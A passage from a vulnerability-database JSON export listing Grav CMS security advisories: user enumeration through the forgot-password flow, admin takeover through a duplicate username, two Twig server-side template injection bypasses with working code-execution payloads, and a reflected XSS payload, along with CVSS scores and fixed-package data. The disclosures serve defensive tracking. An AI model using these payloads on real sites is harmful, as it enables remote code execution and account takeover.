enumerate users and disclose sensitive email addresses, which can be leveraged for targeted attacks such as password spraying, phishing, or social engineering. \n\n### Details\n\nThe issue resides in the [`taskForgot()`](https://github.com/getgrav/grav-plugin-admin/blob/6d673fc7c4f6962756f93ae651371e81f7f20924/classes/plugin/Controllers/Login/LoginController.php#L349) function, which handles the forgot password workflow. \nRelevant vulnerable logic:\n\n```php\nif (null === $user || $user->state !== 'enabled' || !$to) {\n ...\n // Generic message for invalid/non-existing users\n $this->setMessage($this->translate('PLUGIN_ADMIN.FORGOT_INSTRUCTIONS_SENT_VIA_EMAIL'));\n return $this->createRedirectResponse($current);\n}\n\nif ($rateLimiter->isRateLimited($username)) {\n ...\n $interval = $config->get('plugins.login.max_pw_resets_interval', 2);\n\n // Sensitive message for valid users\n $this->setMessage($this->translate('PLUGIN_LOGIN.FORGOT_CANNOT_RESET_IT_IS_BLOCKED', $to, $interval), 'error');\n\n return $this->createRedirectResponse($current);\n}\n```\n\nWhen an attacker submits the password reset form at `/admin/forgot` with an **invalid username**, the application responds with: \n\n```\nInstructions to reset your password have been sent to your email address\n```\n\nHowever, when a **valid username** is supplied, and the attacker repeatedly triggers password reset requests, the application responds with: \n\n```\nCannot reset password for <USER_EMAIL>, password reset functionality temporarily blocked, please try later (maximum 60 minutes)\n```\n\nThis discrepancy in responses enables: \n1. **User Enumeration** – Attackers can determine if a username exists in the system by analyzing the response. \n2. **User Email Disclosure** – The system discloses the actual email address associated with the account (e.g., `admin@localhost.test`). \n\nThis violates best practices for authentication flows, where responses should remain generic to avoid leaking sensitive information.\n\n### PoC\n1. Navigate to the **Forgot Password** page: `https://<target>/admin/forgot`\n1. Submit a reset request with a random/invalid username (e.g., `invalid_user`): \n\n- Response: \n ```\n Instructions to reset your password have been sent to your email address\n ```\n3. Submit a reset request with a valid username (e.g., `admin`). \n4. Repeatedly request a reset for the same username until the lockout mechanism triggers. \n- Response: \n ```\n Cannot reset password for admin@localhost.test, password reset functionality temporarily blocked, please try later (maximum 60 minutes)\n ```\n5. Observe the leaked **email address** of the admin account in the error message. \n\n### Impact\n- **Severity:** Medium \n- **Type:** Information Disclosure / User Enumeration \n- **Who is Impacted:** All Grav sites using Admin plugin **v1.10.49.1** with password reset enabled. \n- **Risks:** \n - Allows attackers to enumerate valid usernames. \n - Exposes email addresses of admin accounts, which can be used in: \n - Credential stuffing \n - Password spraying \n - Phishing/social engineering campaigns \n - Further exploitation in combination with other vulnerabilities \n\n\n### Recommendation\n\n- Modify the [`taskForgot()`](https://github.com/getgrav/grav-plugin-admin/blob/6d673fc7c4f6962756f93ae651371e81f7f20924/classes/plugin/Controllers/Login/LoginController.php#L349) logic to always return a generic, non-identifying message, regardless of whether the username exists or rate limits are hit.\n\n- Example safe response:\n ```ini\n If the account exists, password reset instructions will be sent.\n ```\n\n- Do not include email addresses ($to) or other sensitive data in error messages.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66307","reference_id":"","reference_type":"","scores":[{"value":"0.00059","scoring_system":"epss","scoring_elements":"0.18701","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66307"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav-plugin-admin/blob/6d673fc7c4f6962756f93ae651371e81f7f20924/classes/plugin/Controllers/Login/LoginController.php#L349","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav-plugin-admin/blob/6d673fc7c4f6962756f93ae651371e81f7f20924/classes/plugin/Controllers/Login/LoginController.php#L349"},{"reference_url":"https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-12-02T20:07:49Z/"}],"url":"https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-q3qx-cp62-f6m7","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-12-02T20:07:49Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-q3qx-cp62-f6m7"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66307","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66307"},{"reference_url":"https://github.com/advisories/GHSA-q3qx-cp62-f6m7","reference_id":"GHSA-q3qx-cp62-f6m7","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-q3qx-cp62-f6m7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63161?format=json","purl":"pkg:composer/getgrav/grav@1.8.0-beta.27","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2fzp-f93m-afe3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"}],"aliases":["CVE-2025-66307","GHSA-q3qx-cp62-f6m7"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-f8zy-fcfc-tfdc"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/30050?format=json","vulnerability_id":"VCID-fg9g-7eg3-7ygr","summary":"Grav vulnerable to Privilege Escalation in Grav Admin: Missing Username Uniqueness Check Allows Admin Account Takeover\n### Summary\nA privilege escalation vulnerability exists in Grav’s Admin plugin due to the absence of username uniqueness validation when creating users.\nA user with the create user permission can create a new account using the same username as an existing administrator account, set a new password/email, and then log in as that administrator. This effectively allows privilege escalation from limited user-manager permissions to full administrator access.\n\n\n### Steps to Reproduce\n1. Make sure you have two accounts: an admin and a user with create user privilege\n2. In the user account, navigate to /grav-admin/admin/accounts/users and click \"Add\"\n3. Enter the name of the admin, complete registration and observe that the existing admin’s email is changed to the value you provided.\n4. Log out from user account log in as admin with new credentials\n\n\n### Impact\n1. Full admin takeover by any user with create user permission.\n2. Ability to change admin credentials, install/remove plugins, read or modify site data, and execute any action available to an admin.\n3. Severity: High/Critical.\n\n\n### PoC\nhttps://github.com/user-attachments/assets/3ab0a7d6-5055-41be-9e0e-2bd6ca359b37","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66296","reference_id":"","reference_type":"","scores":[{"value":"0.00062","scoring_system":"epss","scoring_elements":"0.19604","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66296"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/commit/3462d94d575064601689b236508c316242e15741","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-12-02T14:05:57Z/"}],"url":"https://github.com/getgrav/grav/commit/3462d94d575064601689b236508c316242e15741"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-cjcp-qxvg-4rjm","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-12-02T14:05:57Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-cjcp-qxvg-4rjm"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66296","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66296"},{"reference_url":"https://github.com/advisories/GHSA-cjcp-qxvg-4rjm","reference_id":"GHSA-cjcp-qxvg-4rjm","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cjcp-qxvg-4rjm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63161?format=json","purl":"pkg:composer/getgrav/grav@1.8.0-beta.27","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2fzp-f93m-afe3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"}],"aliases":["CVE-2025-66296","GHSA-cjcp-qxvg-4rjm"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-fg9g-7eg3-7ygr"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/38542?format=json","vulnerability_id":"VCID-g8rq-2ss6-3kcu","summary":"grav Server-side Template Injection (SSTI) mitigation bypass\n### Summary\nThe fix for SSTI using `|map`, `|filter` and `|reduce` twigs implemented in the commit [71bbed1](https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b) introduces bypass of the denylist due to incorrect return value from `isDangerousFunction()`, which allows to execute the payload prepending double backslash (`\\\\`) \n\n### Details\nThe `isDangerousFunction()` check in version 1.7.42 and onwards retuns `false` value instead of `true` when the `\\` symbol is found in the `$name`.\n\n```php\n...\n if (strpos($name, \"\\\\\") !== false) {\n return false;\n }\n\n if (in_array($name, $commandExecutionFunctions)) {\n return true;\n }\n...\n```\nBased on the code where the function is used, it is expected that any dangerous condition would return `true`\n```php\n /**\n * @param Environment $env\n * @param array $array\n * @param callable|string $arrow\n * @return array|CallbackFilterIterator\n * @throws RuntimeError\n */\n function mapFunc(Environment $env, $array, $arrow)\n {\n if (!$arrow instanceof \\Closure && !is_string($arrow) || Utils::isDangerousFunction($arrow)) {\n throw new RuntimeError('Twig |map(\"' . $arrow . '\") is not allowed.');\n\t}\n```\nwhen `|map('\\system')` is used in the malicious payload, the single backslash is dropped prior to reaching `strpos($name, '\\\\')` check, thus `$name` variable already has no backslash, and the command is blacklisted because it reaches the `if (in_array($name, $commandExecutionFunctions)) {` validation step. \n\nHowever if `|map('\\\\system')` is used (i.e. double backslash), then the `strpos($name, \"\\\\\") !== false` takes effect, and `isDangerousFunction()` returns `false` , in which case the `RuntimeError` is not generated, and blacklist is bypassed leading to code execution.\n\n### Exploit Conditions\nThis vulnerability can be exploited if the attacker has access to:\n\n1. an Administrator account, or\n2. a non-administrator, user account that has Admin panel access and Create/Update page permissions\n\n### Steps to reproduce\n\n1. Log in to Grav Admin using an administrator account.\n2. Navigate to `Accounts > Add`, and ensure that the following permissions are assigned when creating a new low-privileged user: \n - Login to Admin - Allowed\n - Page Update - Allowed\n3. Log out of Grav Admin\n4. Login using the account created in step 2.\n5. Choose `Pages -> Home`\n6. Click the `Advanced` tab and select the checkbox beside `Twig` to ensure that Twig processing is enabled for the modified webpage.\n7. Under the `Content` tab, insert the following payload within the editor:\n```{{ ['id'] | map('\\\\system') | join() }}```\n8. Click the `Preview` button. Observe that the output of the id shell command is returned in the preview.\n\n### Mitigation\n\n```diff\ndiff --git a/system/src/Grav/Common/Utils.php b/system/src/Grav/Common/Utils.php\nindex 2f121bbe3..7b267cd0f 100644\n--- a/system/src/Grav/Common/Utils.php\n+++ b/system/src/Grav/Common/Utils.php\n@@ -2069,7 +2069,7 @@ abstract class Utils\n }\n \n if (strpos($name, \"\\\\\") !== false) {\n- return false;\n+ return true;\n }\n \n if (in_array($name, $commandExecutionFunctions)) {\n \n```","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-37897","reference_id":"","reference_type":"","scores":[{"value":"0.00118","scoring_system":"epss","scoring_elements":"0.30315","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-37897"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-10-18T16:06:14Z/"}],"url":"https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b"},{"reference_url":"https://github.com/getgrav/grav/commit/b4c62101a43051fc7f5349c7d0a5b6085375c1d7","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-10-18T16:06:14Z/"}],"url":"https://github.com/getgrav/grav/commit/b4c62101a43051fc7f5349c7d0a5b6085375c1d7"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-9436-3gmp-4f53","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-10-18T16:06:14Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-9436-3gmp-4f53"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-37897","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-37897"},{"reference_url":"https://github.com/advisories/GHSA-9436-3gmp-4f53","reference_id":"GHSA-9436-3gmp-4f53","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-9436-3gmp-4f53"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/625481?format=json","purl":"pkg:composer/getgrav/grav@1.7.42.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-13tt-ebbj-eyg8"},{"vulnerability":"VCID-19e3-3agd-bbc8"},{"vulnerability":"VCID-1gzk-uead-q7ch"},{"vulnerability":"VCID-1kvz-tbnw-dyev"},{"vulnerability":"VCID-2fzp-f93m-afe3"},{"vulnerability":"VCID-31dk-jdqj-pfag"},{"vulnerability":"VCID-47rc-kqnw-7ue8"},{"vulnerability":"VCID-6gtj-f6gc-d3bf"},{"vulnerability":"VCID-91ht-8cax-7kdr"},{"vulnerability":"VCID-9h5a-h26f-cudw"},{"vulnerability":"VCID-9h65-8eka-quhd"},{"vulnerability":"VCID-bdnj-twfh-subp"},{"vulnerability":"VCID-bttg-w7fp-ybd2"},{"vulnerability":"VCID-dmbe-mmj8-3baa"},{"vulnerability":"VCID-dmh7-xvmg-27ef"},{"vulnerability":"VCID-dzhh-3xxa-1ycf"},{"vulnerability":"VCID-euf5-wt5v-fqaf"},{"vulnerability":"VCID-f8zy-fcfc-tfdc"},{"vulnerability":"VCID-fg9g-7eg3-7ygr"},{"vulnerability":"VCID-gcpb-7cu7-q3as"},{"vulnerability":"VCID-hdsp-4e4r-c3fh"},{"vulnerability":"VCID-hwcx-1fp9-3bhh"},{"vulnerability":"VCID-ng3h-ees8-vubs"},{"vulnerability":"VCID-p24p-fcpe-xbah"},{"vulnerability":"VCID-rurt-s65k-1yfk"},{"vulnerability":"VCID-swcx-dmqn-2yf9"},{"vulnerability":"VCID-t3bt-hrw2-jya3"},{"vulnerability":"VCID-ugn8-e63y-1fes"},{"vulnerability":"VCID-v5ah-z3uv-fbet"},{"vulnerability":"VCID-vp4w-2f8d-vfcf"},{"vulnerability":"VCID-xe66-6nav-c7gy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.42.2"},{"url":"http://public2.vulnerablecode.io/api/packages/71648?format=json","purl":"pkg:composer/getgrav/grav@1.7.42%2B2","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.42%252B2"}],"aliases":["CVE-2023-37897","GHSA-9436-3gmp-4f53"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-g8rq-2ss6-3kcu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/30410?format=json","vulnerability_id":"VCID-gcpb-7cu7-q3as","summary":"Grav is vulnerable to Cross-Site Scripting (XSS) Reflected endpoint /admin/pages/[page], parameter data[header][content][items], located in the \"Blog Config\" tab\n## Summary\n\nA Reflected Cross-Site Scripting (XSS) vulnerability was identified in the `/admin/pages/[page]` endpoint of the _Grav_ application. This vulnerability allows attackers to inject malicious scripts into the `data[header][content][items]` parameter.\n\n---\n\n## Details\n\n**Vulnerable Endpoint:** `GET /admin/pages/[page]` \n**Parameter:** `data[header][content][items]`\n\nThe application fails to properly validate and sanitize user input in the `data[header][content][items]` parameter. As a result, attackers can craft a malicious URL with an XSS payload. When this URL is accessed, the injected script is reflected back in the HTTP response and executed within the context of the victim's browser session.\n\n---\n\n## PoC\n\n**Payload:**\n\n`\"><ImG sRc=x OnErRoR=alert('XSS-PoC3')>`\n\n1. Log in to the _Grav_ Admin Panel and navigate to **Pages**.\n \n2. Create a new page or edit an existing one.\n \n3. In the **Advanced > Blog Config > Items** field (which maps to `data[header][content][items]`), insert the payload above.\n\n\n\n4. Save the page.\n \n5. The malicious payload is reflected and rendered by the application without proper sanitization. The JavaScript code is immediately executed in the browser.\n\n\n\n---\n\n## Impact\n\nReflected cross-site scripting (XSS) attacks can have serious consequences, including:\n\n- **User actions:** Attackers can perform actions on behalf of the user\n \n- **Data theft:** Sensitive information such as session cookies can be stolen\n \n- **Account compromise:** Attackers may impersonate legitimate users\n \n- **Malicious code execution:** Arbitrary JavaScript code can run in the user’s browser\n \n- **Website defacement or misinformation:** Malicious output may be injected visually\n \n- **User redirection:** Victims may be redirected to phishing or malicious websites\n\nby [CVE-Hunters](https://github.com/Sec-Dojo-Cyber-House/cve-hunters)","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66309","reference_id":"","reference_type":"","scores":[{"value":"0.00032","scoring_system":"epss","scoring_elements":"0.09658","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66309"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T16:12:10Z/"}],"url":"https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-65mj-f7p4-wggq","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T16:12:10Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-65mj-f7p4-wggq"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66309","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66309"},{"reference_url":"https://github.com/advisories/GHSA-65mj-f7p4-wggq","reference_id":"GHSA-65mj-f7p4-wggq","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-65mj-f7p4-wggq"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63161?format=json","purl":"pkg:composer/getgrav/grav@1.8.0-beta.27","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2fzp-f93m-afe3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"}],"aliases":["CVE-2025-66309","GHSA-65mj-f7p4-wggq"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gcpb-7cu7-q3as"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/11839?format=json","vulnerability_id":"VCID-hdsp-4e4r-c3fh","summary":"Server Side Template Injection (SSTI)\n### Summary\nDue to the unrestricted access to twig extension class from grav context, an attacker can redefine config variable. As a result, attacker can bypass previous patch.\n\n### Details\nThe twig context has a function declared called getFunction.\n```php\npublic function getFunction($name)\n {\n if (!$this->extensionInitialized) {\n $this->initExtensions();\n }\n\n if (isset($this->functions[$name])) {\n return $this->functions[$name];\n }\n\n foreach ($this->functions as $pattern => $function) {\n $pattern = str_replace('\\\\*', '(.*?)', preg_quote($pattern, '#'), $count);\n\n if ($count) {\n if (preg_match('#^'.$pattern.'$#', $name, $matches)) {\n array_shift($matches);\n $function->setArguments($matches);\n\n return $function;\n }\n }\n }\n\n foreach ($this->functionCallbacks as $callback) {\n if (false !== $function = \\call_user_func($callback, $name)) {\n return $function;\n }\n }\n\n return false;\n }\n```\nThis function, if the value of `$name` does not exist in `$this->functions`, uses call_user_func to execute callback functions stored in `$this->functionCallbacks`.\n\nIt is possible to register arbitrary function using registerUndefinedFunctionCallback, but a callback that has already been registered exists and new callbacks added will not be executed.\n\nThe default function callback is as follows:\n```php\n$this->twig->registerUndefinedFunctionCallback(function (string $name) use ($config) {\n $allowed = $config->get('system.twig.safe_functions');\n if (is_array($allowed) and in_array($name, $allowed, true) and function_exists($name)) {\n return new TwigFunction($name, $name);\n }\n if ($config->get('system.twig.undefined_functions')) {\n if (function_exists($name)) {\n if (!Utils::isDangerousFunction($name)) {\n user_error(\"PHP function {$name}() was used as Twig function. This is deprecated in Grav 1.7. Please add it to system configuration: `system.twig.safe_functions`\", E_USER_DEPRECATED);\n\n return new TwigFunction($name, $name);\n }\n\n /** @var Debugger $debugger */\n $debugger = $this->grav['debugger'];\n $debugger->addException(new RuntimeException(\"Blocked potentially dangerous PHP function {$name}() being used as Twig function. If you really want to use it, please add it to system configuration: `system.twig.safe_functions`\"));\n }\n\n return new TwigFunction($name, static function () {});\n }\n\n return false;\n });\n```\nIf you look at this function, if the value of system.twig.undefined_functions is false, it returns false.\nIn that case, it is possible for our registered callback to be executed.\n\nAt this time, the `Grav\\Common\\Config\\Config` class is loaded within the grav context, and access to the set method is allowed, making it possible to set the value of system.twig.undefined_functions to false.\nAs a result, an attacker can execute any arbitrarily registered callback function.\n\n### PoC\n```\n{{ grav.twig.twig.registerUndefinedFunctionCallback('system') }}\n{% set a = grav.config.set('system.twig.undefined_functions',false) %}\n{{ grav.twig.twig.getFunction('id') }}\n```\n\n\n\n\n### Impact\nTwig processing of static pages can be enabled in the front matter by any administrative user allowed to create or edit pages.\nAs the Twig processor runs unsandboxed, this behavior can be used to gain arbitrary code execution and elevate privileges on the instance.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-28118","reference_id":"","reference_type":"","scores":[{"value":"0.00394","scoring_system":"epss","scoring_elements":"0.60549","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-28118"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/commit/de1ccfa12dbcbf526104d68c1a6bc202a98698fe","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-07-08T15:04:35Z/"}],"url":"https://github.com/getgrav/grav/commit/de1ccfa12dbcbf526104d68c1a6bc202a98698fe"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-r6vw-8v8r-pmp4","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-07-08T15:04:35Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-r6vw-8v8r-pmp4"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-28118","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-28118"},{"reference_url":"https://github.com/advisories/GHSA-r6vw-8v8r-pmp4","reference_id":"GHSA-r6vw-8v8r-pmp4","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-r6vw-8v8r-pmp4"}],"fixed_packages":[{"url":"